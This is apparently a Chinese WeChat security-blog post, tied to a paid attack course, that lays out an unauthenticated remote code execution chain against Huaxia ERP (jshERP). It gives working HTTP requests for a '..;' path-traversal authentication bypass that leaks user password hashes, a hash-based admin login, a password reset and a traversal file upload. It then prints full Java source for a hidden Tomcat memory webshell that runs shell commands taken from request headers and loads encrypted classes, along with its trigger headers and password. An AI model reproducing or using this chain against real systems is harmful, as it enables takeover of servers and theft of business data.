发布于 3 个月前
发布于 3 个月前
我的名字叫齐天大圣
更新于 3 个月前
0
0
免责声明: 由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
1 ►
前言
华夏ERP全版本未授权RCE及内存马注入。本文来自 《实战攻防》课程开源应用渗透利用篇 。作者: xiuxian
点击下文了解详情👇
[
2 ►
权限绕过
目前最新版V3.3
1GET/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1
通过getAllList读取用户名,密码MD5值。
Hash登录
使用读取得密码MD5值登录超级管理员后台。
1POST /jshERP-boot/user/login HTTP/1.1 2Host: IP 3Content-Length: 67 4Accept: application/json, text/plain, */* 5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 6Content-Type: application/json;charset=UTF-8 7Origin: http://172.20.10.3:3000 8Referer: http://172.20.10.3:3000/user/login 9Accept-Encoding: gzip, deflate 10Accept-Language: zh-CN,zh;q=0.9 11Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1724134392; HMACCOUNT=4FC1696FCCBA0C17; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1724138837 12Connection: close 13 14 15{"loginName":"admin","password":"e10adc3949ba59abbe56e057f20f883e"}
1/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/resetPwd 2 3 4{"id":63}
3 ►
后台利用
超级管理员用户登陆后使用uploadPluginConfigFile接口创建../plugin目录,此目录创建后可部署插件。
1POST /jshERP-boot/plugin/uploadPluginConfigFile HTTP/1.1 2Host: 172.20.10.3:3000 3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 4Accept: */* 5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 6Accept-Encoding: gzip, deflate 7X-Requested-With: XMLHttpRequest 8Content-Type: multipart/form-data; boundary=---------------------------64343665641219398361207370473 9X-Access-Token: 90777cf909864636a458b05de1eab2a9_0 10Content-Length: 247 11 12 13 14 15-----------------------------64343665641219398361207370473 16Content-Disposition: form-data; name="configFile"; filename="../plugins/success.txt" 17Content-Type: text/plain 18 19 20success 21 22 23-----------------------------64343665641219398361207370473--
后台上传插件
编写springboot-plugin-framework-parent插件。
1https://gitee.com/xiongyi01/springboot-plugin-framework-parent
编写冰蝎监听器,部署插件注入内存马。
1package ysoserial.payloads.templates;
2
3
4import com.sun.jmx.mbeanserver.NamedObject;
5import com.sun.jmx.mbeanserver.Repository;
6import com.sun.org.apache.xalan.internal.xsltc.DOM;
7import com.sun.org.apache.xalan.internal.xsltc.TransletException;
8import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
9import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
10import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
11import org.apache.catalina.connector.Request;
12import org.apache.catalina.connector.RequestFacade;
13import org.apache.catalina.connector.Response;
14import org.apache.catalina.core.StandardContext;
15import org.apache.tomcat.util.modeler.Registry;
16
17
18import javax.crypto.Cipher;
19import javax.crypto.spec.SecretKeySpec;
20import javax.management.DynamicMBean;
21import javax.management.MBeanServer;
22import javax.management.ObjectName;
23import javax.servlet.ServletRequestEvent;
24import javax.servlet.ServletRequestListener;
25import javax.servlet.http.HttpSession;
26import java.lang.reflect.Field;
27import java.lang.reflect.Method;
28import java.util.HashMap;
29import java.util.Scanner;
30import java.util.Set;
31
32
33public class TomcatListenerMemShellFromJMX extends AbstractTranslet implements ServletRequestListener {
34 static {
35 try {
36 MBeanServer mbeanServer = Registry.getRegistry(null, null).getMBeanServer();
37 Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
38 field.setAccessible(true);
39 Object obj = field.get(mbeanServer);
40
41
42 field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
43 field.setAccessible(true);
44 Repository repository = (Repository) field.get(obj);
45
46
47 Set<NamedObject> objectSet = repository.query(new ObjectName("Catalina:host=localhost,name=NonLoginAuthenticator,type=Valve,*"), null);
48 if (objectSet.size() == 0) {
49 // springboot的jmx中为Tomcat而非Catalina
50 objectSet = repository.query(new ObjectName("Tomcat:host=localhost,name=NonLoginAuthenticator,type=Valve,*"), null);
51 }
52
53
54 for (NamedObject namedObject : objectSet) {
55 DynamicMBean dynamicMBean = namedObject.getObject();
56 field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
57 field.setAccessible(true);
58 obj = field.get(dynamicMBean);
59
60
61 field = Class.forName("org.apache.catalina.authenticator.AuthenticatorBase").getDeclaredField("context");
62 field.setAccessible(true);
63 StandardContext standardContext = (StandardContext) field.get(obj);
64
65
66 TomcatListenerMemShellFromJMX listener = new TomcatListenerMemShellFromJMX();
67 standardContext.addApplicationEventListener(listener);
68 }
69 } catch (Exception e) {
70// e.printStackTrace();
71 }
72 }
73
74
75 @Override
76 public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
77
78
79 }
80
81
82 @Override
83 public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
84
85
86 }
87
88
89 @Override
90 public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
91
92
93 }
94
95
96 @Override
97 public void requestInitialized(ServletRequestEvent servletRequestEvent) {
98// Listener马没有包装类问题
99 try {
100 RequestFacade requestFacade = (RequestFacade) servletRequestEvent.getServletRequest();
101 Field f = requestFacade.getClass().getDeclaredField("request");
102 f.setAccessible(true);
103 Request request = (Request) f.get(requestFacade);
104 Response response = request.getResponse();
105 // 入口
106 if (request.getHeader("Referer").equalsIgnoreCase("https://www.google.com/")) {
107 // cmdshell
108 if (request.getHeader("x-client-data").equalsIgnoreCase("cmd")) {
109 String cmd = request.getHeader("cmd");
110 if (cmd != null && !cmd.isEmpty()) {
111 String[] cmds = null;
112 if (System.getProperty("os.name").toLowerCase().contains("win")) {
113 cmds = new String[]{"cmd", "/c", cmd};
114 } else {
115 cmds = new String[]{"/bin/bash", "-c", cmd};
116 }
117 String result = new Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
118 response.resetBuffer();
119 response.getWriter().println(result);
120 response.flushBuffer();
121 response.finishResponse();
122 }
123 } else if (request.getHeader("x-client-data").equalsIgnoreCase("rebeyond")) {
124 if (request.getMethod().equals("POST")) {
125 // 创建pageContext
126 HashMap pageContext = new HashMap();
127
128
129 // lastRequest的session是没有被包装的session!!
130 HttpSession session = request.getSession();
131 pageContext.put("request", request);
132 pageContext.put("response", response);
133 pageContext.put("session", session);
134 // 这里判断payload是否为空 因为在springboot2.6.3测试时request.getReader().readLine()可以获取到而采取拼接的话为空字符串
135 String payload = request.getReader().readLine();
136
137
138// System.out.println(payload);
139 // 冰蝎逻辑
140 String k = "e45e329feb5d925b"; // rebeyond
141 session.putValue("u", k);
142 Cipher c = Cipher.getInstance("AES");
143 c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
144 Method method = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
145 method.setAccessible(true);
146 byte[] evilclass_byte = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(payload));
147 Class evilclass = (Class) method.invoke(Thread.currentThread().getContextClassLoader(), evilclass_byte, 0, evilclass_byte.length);
148 evilclass.newInstance().equals(pageContext);
149 }
150 } else {
151 response.resetBuffer();
152 response.getWriter().println("error");
153 response.flushBuffer();
154 response.finishResponse();
155 }
156 }
157 } catch (Exception e) {
158// e.printStackTrace();
159 }
160 }
161}
插件启动,new一个冰蝎监听马。
上传插件连接内存马
1密码:rebeyond 2 3 4Referer: https://www.google.com/ 5x-client-data: rebeyond
华夏ERP漏洞利用一键化工具-实战攻防课程内部专版,报名课程免费获取
4 ►
往期精彩
[
[
攻防渗透&&《黑神话·悟空》\*2份,速来抽奖!](http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247508235&idx=1&sn=5043590d457c5ec778258499582ca04d&chksm=c09ad25bf7ed5b4d12bcd6e140d6a2ef8147894a95d6e3dd0ae6e3c9cfe35dff3925b912b8f2&scene=21#wechat_redirect)
[